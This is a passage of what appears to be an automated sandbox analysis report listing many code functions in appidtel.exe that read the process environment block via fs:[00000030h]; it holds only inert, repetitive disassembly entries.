Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032FB256 mov eax, dword ptr fs:[00000030h] 5_2_032FB256
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032FB256 mov eax, dword ptr fs:[00000030h] 5_2_032FB256
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032CD250 mov ecx, dword ptr fs:[00000030h] 5_2_032CD250
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03246259 mov eax, dword ptr fs:[00000030h] 5_2_03246259
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032552A0 mov eax, dword ptr fs:[00000030h] 5_2_032552A0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032552A0 mov eax, dword ptr fs:[00000030h] 5_2_032552A0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032552A0 mov eax, dword ptr fs:[00000030h] 5_2_032552A0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032552A0 mov eax, dword ptr fs:[00000030h] 5_2_032552A0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D62A0 mov eax, dword ptr fs:[00000030h] 5_2_032D62A0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D62A0 mov ecx, dword ptr fs:[00000030h] 5_2_032D62A0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D62A0 mov eax, dword ptr fs:[00000030h] 5_2_032D62A0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D62A0 mov eax, dword ptr fs:[00000030h] 5_2_032D62A0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D62A0 mov eax, dword ptr fs:[00000030h] 5_2_032D62A0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D62A0 mov eax, dword ptr fs:[00000030h] 5_2_032D62A0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D72A0 mov eax, dword ptr fs:[00000030h] 5_2_032D72A0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D72A0 mov eax, dword ptr fs:[00000030h] 5_2_032D72A0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C92BC mov eax, dword ptr fs:[00000030h] 5_2_032C92BC
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C92BC mov eax, dword ptr fs:[00000030h] 5_2_032C92BC
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C92BC mov ecx, dword ptr fs:[00000030h] 5_2_032C92BC
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C92BC mov ecx, dword ptr fs:[00000030h] 5_2_032C92BC
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033092A6 mov eax, dword ptr fs:[00000030h] 5_2_033092A6
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033092A6 mov eax, dword ptr fs:[00000030h] 5_2_033092A6
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033092A6 mov eax, dword ptr fs:[00000030h] 5_2_033092A6
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033092A6 mov eax, dword ptr fs:[00000030h] 5_2_033092A6
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327E284 mov eax, dword ptr fs:[00000030h] 5_2_0327E284
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327E284 mov eax, dword ptr fs:[00000030h] 5_2_0327E284
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C0283 mov eax, dword ptr fs:[00000030h] 5_2_032C0283
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C0283 mov eax, dword ptr fs:[00000030h] 5_2_032C0283
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C0283 mov eax, dword ptr fs:[00000030h] 5_2_032C0283
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03315283 mov eax, dword ptr fs:[00000030h] 5_2_03315283
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327329E mov eax, dword ptr fs:[00000030h] 5_2_0327329E
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327329E mov eax, dword ptr fs:[00000030h] 5_2_0327329E
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h] 5_2_032F12ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h] 5_2_032F12ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h] 5_2_032F12ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h] 5_2_032F12ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h] 5_2_032F12ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h] 5_2_032F12ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h] 5_2_032F12ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h] 5_2_032F12ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h] 5_2_032F12ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h] 5_2_032F12ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h] 5_2_032F12ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h] 5_2_032F12ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h] 5_2_032F12ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h] 5_2_032F12ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032502E1 mov eax, dword ptr fs:[00000030h] 5_2_032502E1
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032502E1 mov eax, dword ptr fs:[00000030h] 5_2_032502E1
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032502E1 mov eax, dword ptr fs:[00000030h] 5_2_032502E1
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033152E2 mov eax, dword ptr fs:[00000030h] 5_2_033152E2
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032FF2F8 mov eax, dword ptr fs:[00000030h] 5_2_032FF2F8
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032392FF mov eax, dword ptr fs:[00000030h] 5_2_032392FF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032492C5 mov eax, dword ptr fs:[00000030h] 5_2_032492C5
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032492C5 mov eax, dword ptr fs:[00000030h] 5_2_032492C5
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326B2C0 mov eax, dword ptr fs:[00000030h] 5_2_0326B2C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326B2C0 mov eax, dword ptr fs:[00000030h] 5_2_0326B2C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326B2C0 mov eax, dword ptr fs:[00000030h] 5_2_0326B2C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326B2C0 mov eax, dword ptr fs:[00000030h] 5_2_0326B2C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326B2C0 mov eax, dword ptr fs:[00000030h] 5_2_0326B2C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326B2C0 mov eax, dword ptr fs:[00000030h] 5_2_0326B2C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326B2C0 mov eax, dword ptr fs:[00000030h] 5_2_0326B2C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0324A2C3 mov eax, dword ptr fs:[00000030h] 5_2_0324A2C3
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0324A2C3 mov eax, dword ptr fs:[00000030h] 5_2_0324A2C3
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0324A2C3 mov eax, dword ptr fs:[00000030h] 5_2_0324A2C3
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0324A2C3 mov eax, dword ptr fs:[00000030h] 5_2_0324A2C3
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0324A2C3 mov eax, dword ptr fs:[00000030h] 5_2_0324A2C3
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323B2D3 mov eax, dword ptr fs:[00000030h] 5_2_0323B2D3
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323B2D3 mov eax, dword ptr fs:[00000030h] 5_2_0323B2D3
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323B2D3 mov eax, dword ptr fs:[00000030h] 5_2_0323B2D3
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326F2D0 mov eax, dword ptr fs:[00000030h] 5_2_0326F2D0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326F2D0 mov eax, dword ptr fs:[00000030h] 5_2_0326F2D0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03270124 mov eax, dword ptr fs:[00000030h] 5_2_03270124
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03241131 mov eax, dword ptr fs:[00000030h] 5_2_03241131
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03241131 mov eax, dword ptr fs:[00000030h] 5_2_03241131
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323B136 mov eax, dword ptr fs:[00000030h] 5_2_0323B136
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323B136 mov eax, dword ptr fs:[00000030h] 5_2_0323B136
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323B136 mov eax, dword ptr fs:[00000030h] 5_2_0323B136
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323B136 mov eax, dword ptr fs:[00000030h] 5_2_0323B136
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03300115 mov eax, dword ptr fs:[00000030h] 5_2_03300115
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032EA118 mov ecx, dword ptr fs:[00000030h] 5_2_032EA118
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032EA118 mov eax, dword ptr fs:[00000030h] 5_2_032EA118
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032EA118 mov eax, dword ptr fs:[00000030h] 5_2_032EA118
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032EA118 mov eax, dword ptr fs:[00000030h] 5_2_032EA118
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h] 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D9179 mov eax, dword ptr fs:[00000030h] 5_2_032D9179
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03315152 mov eax, dword ptr fs:[00000030h] 5_2_03315152
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D4144 mov eax, dword ptr fs:[00000030h] 5_2_032D4144
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D4144 mov eax, dword ptr fs:[00000030h] 5_2_032D4144
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D4144 mov ecx, dword ptr fs:[00000030h] 5_2_032D4144
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D4144 mov eax, dword ptr fs:[00000030h] 5_2_032D4144
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D4144 mov eax, dword ptr fs:[00000030h] 5_2_032D4144
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03239148 mov eax, dword ptr fs:[00000030h] 5_2_03239148
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03239148 mov eax, dword ptr fs:[00000030h] 5_2_03239148
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03239148 mov eax, dword ptr fs:[00000030h] 5_2_03239148
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03239148 mov eax, dword ptr fs:[00000030h] 5_2_03239148
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03246154 mov eax, dword ptr fs:[00000030h] 5_2_03246154
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03246154 mov eax, dword ptr fs:[00000030h] 5_2_03246154
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323C156 mov eax, dword ptr fs:[00000030h] 5_2_0323C156
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D8158 mov eax, dword ptr fs:[00000030h] 5_2_032D8158
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03247152 mov eax, dword ptr fs:[00000030h] 5_2_03247152
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F11A4 mov eax, dword ptr fs:[00000030h] 5_2_032F11A4
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F11A4 mov eax, dword ptr fs:[00000030h] 5_2_032F11A4
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F11A4 mov eax, dword ptr fs:[00000030h] 5_2_032F11A4
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F11A4 mov eax, dword ptr fs:[00000030h] 5_2_032F11A4
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0325B1B0 mov eax, dword ptr fs:[00000030h] 5_2_0325B1B0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032FC188 mov eax, dword ptr fs:[00000030h] 5_2_032FC188
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032FC188 mov eax, dword ptr fs:[00000030h] 5_2_032FC188
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03280185 mov eax, dword ptr fs:[00000030h] 5_2_03280185
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C019F mov eax, dword ptr fs:[00000030h] 5_2_032C019F
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C019F mov eax, dword ptr fs:[00000030h] 5_2_032C019F
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C019F mov eax, dword ptr fs:[00000030h] 5_2_032C019F
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C019F mov eax, dword ptr fs:[00000030h] 5_2_032C019F
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323A197 mov eax, dword ptr fs:[00000030h] 5_2_0323A197
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323A197 mov eax, dword ptr fs:[00000030h] 5_2_0323A197
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323A197 mov eax, dword ptr fs:[00000030h] 5_2_0323A197
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03297190 mov eax, dword ptr fs:[00000030h] 5_2_03297190
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032651EF mov eax, dword ptr fs:[00000030h] 5_2_032651EF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032651EF mov eax, dword ptr fs:[00000030h] 5_2_032651EF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032651EF mov eax, dword ptr fs:[00000030h] 5_2_032651EF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032651EF mov eax, dword ptr fs:[00000030h] 5_2_032651EF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032651EF mov eax, dword ptr fs:[00000030h] 5_2_032651EF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032651EF mov eax, dword ptr fs:[00000030h] 5_2_032651EF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032651EF mov eax, dword ptr fs:[00000030h] 5_2_032651EF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032651EF mov eax, dword ptr fs:[00000030h] 5_2_032651EF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032651EF mov eax, dword ptr fs:[00000030h] 5_2_032651EF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032651EF mov eax, dword ptr fs:[00000030h] 5_2_032651EF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032651EF mov eax, dword ptr fs:[00000030h] 5_2_032651EF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032651EF mov eax, dword ptr fs:[00000030h] 5_2_032651EF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032651EF mov eax, dword ptr fs:[00000030h] 5_2_032651EF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032451ED mov eax, dword ptr fs:[00000030h] 5_2_032451ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033161E5 mov eax, dword ptr fs:[00000030h] 5_2_033161E5
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032E71F9 mov esi, dword ptr fs:[00000030h] 5_2_032E71F9
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032701F8 mov eax, dword ptr fs:[00000030h] 5_2_032701F8
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033061C3 mov eax, dword ptr fs:[00000030h] 5_2_033061C3
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033061C3 mov eax, dword ptr fs:[00000030h] 5_2_033061C3
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327D1D0 mov eax, dword ptr fs:[00000030h] 5_2_0327D1D0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327D1D0 mov ecx, dword ptr fs:[00000030h] 5_2_0327D1D0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033151CB mov eax, dword ptr fs:[00000030h] 5_2_033151CB
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032BE1D0 mov eax, dword ptr fs:[00000030h] 5_2_032BE1D0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032BE1D0 mov eax, dword ptr fs:[00000030h] 5_2_032BE1D0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032BE1D0 mov ecx, dword ptr fs:[00000030h] 5_2_032BE1D0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032BE1D0 mov eax, dword ptr fs:[00000030h] 5_2_032BE1D0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032BE1D0 mov eax, dword ptr fs:[00000030h] 5_2_032BE1D0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323A020 mov eax, dword ptr fs:[00000030h] 5_2_0323A020
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323C020 mov eax, dword ptr fs:[00000030h] 5_2_0323C020
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330903E mov eax, dword ptr fs:[00000030h] 5_2_0330903E
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330903E mov eax, dword ptr fs:[00000030h] 5_2_0330903E
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330903E mov eax, dword ptr fs:[00000030h] 5_2_0330903E
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330903E mov eax, dword ptr fs:[00000030h] 5_2_0330903E
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C4000 mov ecx, dword ptr fs:[00000030h] 5_2_032C4000
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0325E016 mov eax, dword ptr fs:[00000030h] 5_2_0325E016
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0325E016 mov eax, dword ptr fs:[00000030h] 5_2_0325E016
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0325E016 mov eax, dword ptr fs:[00000030h] 5_2_0325E016
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0325E016 mov eax, dword ptr fs:[00000030h] 5_2_0325E016
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C106E mov eax, dword ptr fs:[00000030h] 5_2_032C106E
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03315060 mov eax, dword ptr fs:[00000030h] 5_2_03315060
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03251070 mov eax, dword ptr fs:[00000030h] 5_2_03251070
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03251070 mov ecx, dword ptr fs:[00000030h] 5_2_03251070
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03251070 mov eax, dword ptr fs:[00000030h] 5_2_03251070
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03251070 mov eax, dword ptr fs:[00000030h] 5_2_03251070
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03251070 mov eax, dword ptr fs:[00000030h] 5_2_03251070
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03251070 mov eax, dword ptr fs:[00000030h] 5_2_03251070
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03251070 mov eax, dword ptr fs:[00000030h] 5_2_03251070
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03251070 mov eax, dword ptr fs:[00000030h] 5_2_03251070
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03251070 mov eax, dword ptr fs:[00000030h] 5_2_03251070
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03251070 mov eax, dword ptr fs:[00000030h] 5_2_03251070
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03251070 mov eax, dword ptr fs:[00000030h] 5_2_03251070
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03251070 mov eax, dword ptr fs:[00000030h] 5_2_03251070
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03251070 mov eax, dword ptr fs:[00000030h] 5_2_03251070
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326C073 mov eax, dword ptr fs:[00000030h] 5_2_0326C073
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032BD070 mov ecx, dword ptr fs:[00000030h] 5_2_032BD070
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032E705E mov ebx, dword ptr fs:[00000030h] 5_2_032E705E
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032E705E mov eax, dword ptr fs:[00000030h] 5_2_032E705E
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03242050 mov eax, dword ptr fs:[00000030h] 5_2_03242050
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326B052 mov eax, dword ptr fs:[00000030h] 5_2_0326B052
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C6050 mov eax, dword ptr fs:[00000030h] 5_2_032C6050
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D80A8 mov eax, dword ptr fs:[00000030h] 5_2_032D80A8
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033060B8 mov eax, dword ptr fs:[00000030h] 5_2_033060B8
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033060B8 mov ecx, dword ptr fs:[00000030h] 5_2_033060B8
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032CD080 mov eax, dword ptr fs:[00000030h] 5_2_032CD080
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032CD080 mov eax, dword ptr fs:[00000030h] 5_2_032CD080
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0324208A mov eax, dword ptr fs:[00000030h] 5_2_0324208A
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323D08D mov eax, dword ptr fs:[00000030h] 5_2_0323D08D
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03245096 mov eax, dword ptr fs:[00000030h] 5_2_03245096
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326D090 mov eax, dword ptr fs:[00000030h] 5_2_0326D090
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326D090 mov eax, dword ptr fs:[00000030h] 5_2_0326D090
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327909C mov eax, dword ptr fs:[00000030h] 5_2_0327909C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323A0E3 mov ecx, dword ptr fs:[00000030h] 5_2_0323A0E3
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032650E4 mov eax, dword ptr fs:[00000030h] 5_2_032650E4
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032650E4 mov ecx, dword ptr fs:[00000030h] 5_2_032650E4
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C60E0 mov eax, dword ptr fs:[00000030h] 5_2_032C60E0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032480E9 mov eax, dword ptr fs:[00000030h] 5_2_032480E9
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323C0F0 mov eax, dword ptr fs:[00000030h] 5_2_0323C0F0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032820F0 mov ecx, dword ptr fs:[00000030h] 5_2_032820F0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032570C0 mov eax, dword ptr fs:[00000030h] 5_2_032570C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032570C0 mov ecx, dword ptr fs:[00000030h] 5_2_032570C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032570C0 mov ecx, dword ptr fs:[00000030h] 5_2_032570C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032570C0 mov eax, dword ptr fs:[00000030h] 5_2_032570C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032570C0 mov ecx, dword ptr fs:[00000030h] 5_2_032570C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032570C0 mov ecx, dword ptr fs:[00000030h] 5_2_032570C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032570C0 mov eax, dword ptr fs:[00000030h] 5_2_032570C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032570C0 mov eax, dword ptr fs:[00000030h] 5_2_032570C0
